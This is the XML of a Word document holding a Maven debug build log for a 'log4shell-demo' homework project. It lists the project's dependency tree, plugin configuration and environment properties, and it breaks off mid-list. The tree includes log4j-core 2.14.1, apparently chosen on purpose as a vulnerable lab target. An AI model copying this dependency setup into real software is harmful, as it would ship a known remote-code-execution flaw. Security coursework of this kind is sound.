    <w:p w14:paraId="346179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1A8165D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 exit fork of com.example:log4shell-demo:0.0.1-SNAPSHOT for org.springframework.boot:spring-boot-maven-plugin:2.5.5:run (default-cli) ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712D1C2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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9F15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Goal:          org.springframework.boot:spring-boot-maven-plugin:2.5.5:run (default-cli)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740AEA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Style:         Regular</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DC1B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Configuration: &lt;?xml version="1.0" encoding="UTF-8"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541F36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4C7FBCD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&lt;addResources default-value="false"&gt;${spring-boot.run.addResources}&lt;/addResources&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7B81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&lt;agents&gt;${spring-boot.run.agents}&lt;/agents&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C189B9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&lt;classesDirectory default-value="${project.build.outputDirectory}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471567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&lt;commandlineArguments&gt;${spring-boot.run.arguments}&lt;/commandlineArguments&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B432B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&lt;directories&gt;${spring-boot.run.directories}&lt;/directories&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFAF2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&lt;excludeGroupIds default-value=""&gt;${spring-boot.excludeGroupIds}&lt;/excludeGroupIds&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082AB3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&lt;excludes&gt;${spring-boot.excludes}&lt;/excludes&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693B8DD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&lt;fork default-value="true"&gt;${spring-boot.run.fork}&lt;/fork&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBD98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&lt;includes&gt;${spring-boot.includes}&lt;/includes&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009B91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&lt;jvmArguments&gt;${spring-boot.run.jvmArguments}&lt;/jvmArguments&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1ED3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&lt;mainClass&gt;com.example.log4shell.Log4ShellDemoApplication&lt;/mainClass&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189C450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&lt;noverify&gt;${spring-boot.run.noverify}&lt;/noverify&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E10004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&lt;optimizedLaunch default-value="true"&gt;${spring-boot.run.optimizedLaunch}&lt;/optimizedLaunch&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E726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&lt;profiles&gt;${spring-boot.run.profiles}&lt;/profiles&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC7F76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&lt;project default-value="${project}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6B63C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&lt;session default-value="${session}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E024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 default-value="false"&gt;${spring-boot.run.skip}&lt;/skip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F4C1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&lt;useTestClasspath default-value="false"&gt;${spring-boot.run.useTestClasspath}&lt;/useTestClasspath&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9E27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&lt;workingDirectory&gt;${spring-boot.run.workingDirectory}&lt;/workingDirectory&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17529A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56FC46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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272B9D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F43A21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&gt;&gt;&gt; spring-boot-maven-plugin:2.5.5:run (default-cli) &gt; test-compile @ log4shell-demo &gt;&gt;&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70ADFC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Dependency collection stats {ConflictMarker.analyzeTime=436579, ConflictMarker.markTime=143742, ConflictMarker.nodeCount=71, ConflictIdSorter.graphTime=263496, ConflictIdSorter.topsortTime=183063, ConflictIdSorter.conflictIdCount=36, ConflictIdSorter.conflictIdCycleCount=0, ConflictResolver.totalTime=16800860, ConflictResolver.conflictItemCount=70, DefaultDependencyCollector.collectTime=216965883, DefaultDependencyCollector.transformTime=18931452}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA9C6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com.example:log4shell-demo:jar:0.0.1-SNAPSHOT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553693C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org.springframework.boot:spring-boot-starter-web:jar:2.5.5:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CF88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org.springframework.boot:spring-boot-starter:jar:2.5.5:compile (version managed from 2.5.5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19AC60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org.springframework.boot:spring-boot:jar:2.5.5:compile (version managed from 2.5.5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050535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org.springframework.boot:spring-boot-autoconfigure:jar:2.5.5:compile (version managed from 2.5.5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D5A3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org.springframework.boot:spring-boot-starter-logging:jar:2.5.5:compile (version managed from 2.5.5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EFB4B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ch.qos.logback:logback-classic:jar:1.2.6:compile (version managed from 1.2.6)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F459D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ch.qos.logback:logback-core:jar:1.2.6:compile (version managed from 1.2.6)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7427A8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org.apache.logging.log4j:log4j-to-slf4j:jar:2.14.1:compile (version managed from 2.14.1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307292B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jakarta.annotation:jakarta.annotation-api:jar:1.3.5:compile (version managed from 1.3.5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3672258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org.springframework:spring-core:jar:5.3.10:compile (version managed from 5.3.10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5415AF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org.springframework:spring-jcl:jar:5.3.10:compile (version managed from 5.3.10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEF934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org.yaml:snakeyaml:jar:1.28:compile (version managed from 1.28)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F274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org.springframework.boot:spring-boot-starter-json:jar:2.5.5:compile (version managed from 2.5.5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6ED4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com.fasterxml.jackson.core:jackson-databind:jar:2.12.5:compile (version managed from 2.12.5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CB42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com.fasterxml.jackson.core:jackson-annotations:jar:2.12.5:compile (version managed from 2.12.5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B118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com.fasterxml.jackson.core:jackson-core:jar:2.12.5:compile (version managed from 2.12.5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61FD40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com.fasterxml.jackson.datatype:jackson-datatype-jdk8:jar:2.12.5:compile (version managed from 2.12.5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BABA6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com.fasterxml.jackson.datatype:jackson-datatype-jsr310:jar:2.12.5:compile (version managed from 2.12.5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1315E4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com.fasterxml.jackson.module:jackson-module-parameter-names:jar:2.12.5:compile (version managed from 2.12.5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F685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org.springframework.boot:spring-boot-starter-tomcat:jar:2.5.5:compile (version managed from 2.5.5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117E9FF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org.apache.tomcat.embed:tomcat-embed-core:jar:9.0.53:compile (version managed from 9.0.53)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CA850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org.apache.tomcat.embed:tomcat-embed-el:jar:9.0.53:compile (version managed from 9.0.53)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115EBC1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org.apache.tomcat.embed:tomcat-embed-websocket:jar:9.0.53:compile (version managed from 9.0.53)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6237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org.springframework:spring-web:jar:5.3.10:compile (version managed from 5.3.10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EDEF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org.springframework:spring-beans:jar:5.3.10:compile (version managed from 5.3.10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FDB79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org.springframework:spring-webmvc:jar:5.3.10:compile (version managed from 5.3.10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E79DE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org.springframework:spring-aop:jar:5.3.10:compile (version managed from 5.3.10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044E0E0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org.springframework:spring-context:jar:5.3.10:compile (version managed from 5.3.10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417D62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org.springframework:spring-expression:jar:5.3.10:compile (version managed from 5.3.10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02333D4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org.springframework.boot:spring-boot-starter-log4j2:jar:2.5.5:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C205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org.apache.logging.log4j:log4j-slf4j-impl:jar:2.14.1:compile (version managed from 2.14.1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68471D7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org.slf4j:slf4j-api:jar:1.7.32:compile (version managed from 1.7.25)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B42DC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org.apache.logging.log4j:log4j-api:jar:2.14.1:compile (version managed from 2.14.1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2191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org.apache.logging.log4j:log4j-core:jar:2.14.1:compile (version managed from 2.14.1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DEEB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org.apache.logging.log4j:log4j-jul:jar:2.14.1:compile (version managed from 2.14.1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340BA92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org.slf4j:jul-to-slf4j:jar:1.7.32:compile (version managed from 1.7.32)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E65CA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621D83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maven-resources-plugin:3.2.0:resources (default-resources) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2141FD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mirror maven-default-http-blocker (http://0.0.0.0/) for apache.snapshots (http://repository.apache.org/snapshots).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9D84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mirror maven-default-http-blocker (http://0.0.0.0/) for repository.jboss.org (http://repository.jboss.org/maven2).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FF4C2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mirror maven-default-http-blocker (http://0.0.0.0/) for snapshots.jboss.org (http://snapshots.jboss.org/maven2).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311A73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mirror maven-default-http-blocker (http://0.0.0.0/) for oss.sonatype.org/jboss-snapshots (http://oss.sonatype.org/content/repositories/jboss-snapshots).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED0B9B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mirror maven-default-http-blocker (http://0.0.0.0/) for codehaus.snapshots (http://snapshots.repository.codehaus.org).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0870E6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[DEBUG] Dependency collection stats {ConflictMarker.analyzeTime=199640, ConflictMarker.markTime=555423, ConflictMarker.nodeCount=99, ConflictIdSorter.graphTime=95165, ConflictIdSorter.topsortTime=28081, ConflictIdSorter.conflictIdCount=35, ConflictIdSorter.conflictIdCycleCount=0, ConflictResolver.totalTime=667103, </w:t>
      </w:r>
      <w:r w:rsidRPr="009B72F7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ConflictResolver.conflictItemCount=85, DefaultDependencyCollector.collectTime=283771466, DefaultDependencyCollector.transformTime=1603178}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E36CC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org.apache.maven.plugins:maven-resources-plugin:jar:3.2.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473FF40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org.apache.maven:maven-plugin-api:jar:3.1.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B82A05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org.apache.maven:maven-artifact:jar:3.1.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4F03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org.apache.maven:maven-core:jar:3.1.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B45242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org.apache.maven:maven-settings:jar:3.1.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6689CF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org.apache.maven:maven-settings-builder:jar:3.1.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF4E1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org.apache.maven:maven-repository-metadata:jar:3.1.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0082A8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org.apache.maven:maven-model-builder:jar:3.1.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8BE8D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org.apache.maven:maven-aether-provider:jar:3.1.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2570CE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org.eclipse.aether:aether-spi:jar:0.9.0.M2:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A1CD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org.eclipse.aether:aether-impl:jar:0.9.0.M2:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21559E7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org.eclipse.aether:aether-api:jar:0.9.0.M2:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CAC76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org.eclipse.aether:aether-util:jar:0.9.0.M2:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3A77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org.codehaus.plexus:plexus-utils:jar:3.0.10:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710CA6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org.codehaus.plexus:plexus-classworlds:jar:2.4.2:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D49E6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org.sonatype.plexus:plexus-sec-dispatcher:jar:1.3:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67238B8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org.sonatype.plexus:plexus-cipher:jar:1.4:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59ACD6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org.apache.maven:maven-model:jar:3.1.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BEC3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org.codehaus.plexus:plexus-component-annotations:jar:2.0.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4CB7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org.codehaus.plexus:plexus-interpolation:jar:1.26:runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2714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org.eclipse.sisu:org.eclipse.sisu.plexus:jar:0.0.0.M2a:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F49EB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javax.enterprise:cdi-api:jar:1.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DD9E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javax.annotation:jsr250-api:jar:1.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E142D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javax.inject:javax.inject:jar:1:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771B55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com.google.guava:guava:jar:10.0.1:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA102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com.google.code.findbugs:jsr305:jar:1.3.9:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DDB1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org.sonatype.sisu:sisu-guice:jar:no_aop:3.1.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FAA8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aopalliance:aopalliance:jar:1.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1230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org.eclipse.sisu:org.eclipse.sisu.inject:jar:0.0.0.M2a:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EB83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asm:asm:jar:3.3.1:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1382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org.apache.maven.shared:maven-filtering:jar:3.2.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00929F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org.apache.maven.shared:maven-shared-utils:jar:3.3.3:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FB16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org.sonatype.plexus:plexus-build-api:jar:0.0.7:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22AB656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commons-io:commons-io:jar:2.6:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245D13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org.apache.commons:commons-lang3:jar:3.8.1:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B146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Created new class realm plugin&gt;org.apache.maven.plugins:maven-resources-plugin:3.2.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F17F0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Importing foreign packages into class realm plugin&gt;org.apache.maven.plugins:maven-resources-plugin:3.2.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A405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&lt; maven.api</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566A638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Populating class realm plugin&gt;org.apache.maven.plugins:maven-resources-plugin:3.2.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A79B4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org.apache.maven.plugins:maven-resources-plugin:jar:3.2.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A04AC2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org.eclipse.aether:aether-util:jar:0.9.0.M2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604E2B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org.codehaus.plexus:plexus-utils:jar:3.0.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31ECFE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org.sonatype.plexus:plexus-sec-dispatcher:jar:1.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF14E5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org.sonatype.plexus:plexus-cipher:jar:1.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2357300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org.codehaus.plexus:plexus-component-annotations:jar:2.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D96C7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org.codehaus.plexus:plexus-interpolation:jar:1.26</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2293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javax.enterprise:cdi-api:jar:1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6F5B2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javax.annotation:jsr250-api:jar:1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0962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com.google.guava:guava:jar:10.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0513C4B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com.google.code.findbugs:jsr305:jar:1.3.9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626DF3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org.sonatype.sisu:sisu-guice:jar:no_aop:3.1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2FB5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aopalliance:aopalliance:jar:1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5456A78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org.eclipse.sisu:org.eclipse.sisu.inject:jar:0.0.0.M2a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B65533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asm:asm:jar:3.3.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19370E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org.apache.maven.shared:maven-filtering:jar:3.2.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702C49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org.apache.maven.shared:maven-shared-utils:jar:3.3.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1A450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org.sonatype.plexus:plexus-build-api:jar:0.0.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D607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Included: commons-io:commons-io:jar:2.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE35A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org.apache.commons:commons-lang3:jar:3.8.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061BB9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org.apache.maven.plugins:maven-resources-plugin:3.2.0:resources from plugin realm ClassRealm[plugin&gt;org.apache.maven.plugins:maven-resources-plugin:3.2.0, parent: jdk.internal.loader.ClassLoaders$AppClassLoader@4e0e2f2a]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70954C3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'org.apache.maven.plugins:maven-resources-plugin:3.2.0:resources' with basic configurator --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9AC5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addDefaultExcludes = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA2E81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buildFilters = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AAFAB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delimiters = [@]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6062911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encoding = UTF-8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4063EB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escapeWindowsPaths = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5460B58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fileNameFiltering = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1FED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includeEmptyDirs = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF981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outputDirectory = /home/ec2-user/log4shell-homework/target/classes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD821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overwrite = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109255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project = MavenProject: com.example:log4shell-demo:0.0.1-SNAPSHOT @ /home/ec2-user/log4shell-homework/pom.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EAD2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propertiesEncoding = UTF-8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A9DF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resources = [Resource {targetPath: null, filtering: true, FileSet {directory: /home/ec2-user/log4shell-homework/src/main/resources, PatternSet [includes: {**/application*.yml, **/application*.yaml, **/application*.properties}, excludes: {}]}}, Resource {targetPath: null, filtering: false, FileSet {directory: /home/ec2-user/log4shell-homework/src/main/resources, PatternSet [includes: {}, excludes: {**/application*.yml, **/application*.yaml, **/application*.properties}]}}]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F30D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session = org.apache.maven.execution.MavenSession@3cd59ef5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156088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skip = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336845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supportMultiLineFiltering = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422F60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useBuildFilters = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA6D2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useDefaultDelimiters = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E151A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end configuration --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F06C7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[DEBUG] properties used {spring-integration.version=5.5.4, flyway.version=7.7.3, java.specification.version=17, webjars-hal-browser.version=3325375, java.vendor.url=https://aws.amazon.com/corretto/, sun.boot.library.path=/usr/lib/jvm/java-17-amazon-corretto.x86_64/lib, </w:t>
      </w:r>
      <w:r w:rsidRPr="009B72F7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>sun.java.command=org.codehaus.plexus.classworlds.launcher.Launcher spring-boot:run -X, jdk.debug=release, maven.version=3.8.4, javax-activation.version=1.2.0, kafka.version=2.7.1, jboss-transaction-spi.version=7.6.1.Final, java.vm.specification.vendor=Oracle Corporation, java.specification.name=Java Platform API Specification, byte-buddy.version=1.10.22, maven-install-plugin.version=2.5.2, env.which_declare=declare -f, java.runtime.version=17.0.15+6-LTS, httpclient5.version=5.0.4, env.SELINUX_ROLE_REQUESTED=, java.vendor.version=Corretto-17.0.15.6.1, env.HISTCONTROL=ignoredups, micrometer.version=1.7.4, rxjava-adapter.version=1.2.1, project.baseUri=file:/home/ec2-user/log4shell-homework/, hibernate.version=5.4.32.Final, java.io.tmpdir=/tmp, java.version=17.0.15, javax-persistence.version=2.2, jakarta-ws-rs.version=2.1.6, build-helper-maven-plugin.version=3.2.0, mockito.version=3.9.0, java.vm.specification.name=Java Virtual Machine Specification, infinispan.version=12.1.7.Final, nekohtml.version=1.9.22, maven-assembly-plugin.version=3.3.0, native.encoding=UTF-8, java.library.path=/usr/java/packages/lib:/usr/lib64:/lib64:/lib:/usr/lib, jakarta-servlet.version=4.0.4, java.vendor=Amazon.com Inc., java.specification.maintenance.version=1, thymeleaf-extras-java8time.version=3.0.4.RELEASE, undertow.version=2.2.10.Final, mariadb.version=2.7.4, selenium-htmlunit.version=2.49.1, thymeleaf-extras-data-attribute.version=2.0.1, ehcache3.version=3.9.6, jakarta-xml-bind.version=2.3.3, commons-dbcp2.version=2.8.0, env.LANG=C.UTF-8, mongodb.version=4.2.3, java.vm.specification.version=17, javax-transaction.version=1.3, maven.compiler.source=11, env.BASH_FUNC_which%%=() {  ( alias;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722892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eval ${which_declare} ) | /usr/bin/which --tty-only --read-alias --read-functions --show-tilde --show-dot "$@"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199B05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user.home=/home/ec2-user, postgresql.version=42.2.23, reactive-streams.version=1.0.3, env.DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/1000/bus, jmustache.version=1.15, querydsl.version=4.4.0, appengine-sdk.version=1.9.91, thymeleaf-layout-dialect.version=2.5.3, hamcrest.version=2.2, os.version=6.1.134-152.225.amzn2023.x86_64, commons-pool.version=1.6, jakarta-jms.version=2.0.3, jakarta-transaction.version=1.3.3, env.MAIL=/var/spool/mail/ec2-user, java.vm.name=OpenJDK 64-Bit Server VM, maven-help-plugin.version=3.2.0, mimepull.version=1.9.15, json-path.version=2.5.0, jaxen.version=1.2.0, johnzon.version=1.2.14, os.arch=amd64, spring-batch.version=4.3.3, couchbase-client.version=3.1.7, derby.version=10.14.2.0, javax-jsonb.version=1.0, rxjava2.version=2.2.21, javax-jaxws.version=2.3.1, json-smart.version=2.4.7, javax-websocket.version=1.1, commons-codec.version=1.15, caffeine.version=2.9.2, h2.version=1.4.200, env.JAVA_HOME=/usr/lib/jvm/java-17, java.vm.compressedOopsMode=32-bit, pooled-jms.version=1.2.2, unboundid-ldapsdk.version=4.0.14, thymeleaf-extras-springsecurity.version=3.0.4.RELEASE, javax-jaxb.version=2.3.1, sqlite-jdbc.version=3.34.0, jakarta-servlet-jsp-jstl.version=1.2.7, activemq.version=5.16.3, httpasyncclient.version=4.1.4, jtds.version=1.3.1, javax-jms.version=2.0.1, jakarta-websocket.version=1.1.2, env.LOGNAME=ec2-user, spring-security.version=5.5.2, hibernate-validator.version=6.2.0.Final, assertj.version=3.19.0, jakarta-xml-soap.version=1.4.2, influxdb-java.version=2.21, httpcore5.version=5.1.1, lombok.version=1.18.20, maven.compiler.target=11, jakarta-xml-ws.version=2.3.3, env.S_COLORS=auto, library.jansi.path=/usr/share/maven/lib/jansi-native, env.XDG_SESSION_CLASS=user, commons-pool2.version=2.9.0, jackson-bom.version=2.12.5, env.VIRTUAL_ENV=/home/ec2-user/log4shell-homework/venv, spring-retry.version=1.3.1, maven-invoker-plugin.version=3.2.2, maven-antrun-plugin.version=1.8, maven.conf=/usr/share/maven/conf, sun.java.launcher=SUN_STANDARD, resource.delimiter=@, javax-json.version=1.1.4, jboss-logging.version=3.4.2.Final, maven-resources-plugin.version=3.2.0, javax-validation.version=2.0.1.Final, netty.version=4.1.68.Final, jetty-jsp.version=2.2.0.v201112011158, maven-source-plugin.version=3.2.1, jetty.version=9.4.43.v20210629, rxjava.version=1.3.8, elasticsearch.version=7.12.1, java.runtime.name=OpenJDK Runtime Environment, env.XDG_SESSION_ID=8, rest-assured.version=4.3.3, env.SYSTEMD_COLORS=false, maven-</w:t>
      </w:r>
      <w:r w:rsidRPr="009B72F7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">deploy-plugin.version=2.8.2, env.MAVEN_CMD_LINE_ARGS= spring-boot:run -X, log4j2.version=2.14.1, maven-failsafe-plugin.version=2.22.2, spring-framework.version=5.3.10, dropwizard-metrics.version=4.1.25, git-commit-id-plugin.version=4.0.5, kotlin-coroutines.version=1.5.2, hazelcast-hibernate5.version=2.2.1, htmlunit.version=2.49.1, env.TERM=xterm-256color, sun.arch.data.model=64, spring-restdocs.version=2.0.5.RELEASE, freemarker.version=2.3.31, thymeleaf.version=3.0.12.RELEASE, jakarta-json.version=1.1.6, janino.version=3.1.6, maven-jar-plugin.version=3.2.0, maven-compiler-plugin.version=3.8.1, java.specification.vendor=Oracle Corporation, rabbit-amqp-client.version=5.12.0, java.version.date=2025-04-15, spring-amqp.version=2.3.10, java.home=/usr/lib/jvm/java-17-amazon-corretto.x86_64, maven-war-plugin.version=3.3.2, jolokia.version=1.6.2, sun.management.compiler=HotSpot 64-Bit Tiered Compilers, jetty-reactive-httpclient.version=1.1.10, env.PATH=/home/ec2-user/log4shell-homework/venv/bin:/home/ec2-user/.local/bin:/home/ec2-user/bin:/usr/local/bin:/usr/bin:/usr/local/sbin:/usr/sbin, maven-dependency-plugin.version=3.1.2, httpclient.version=4.5.13, 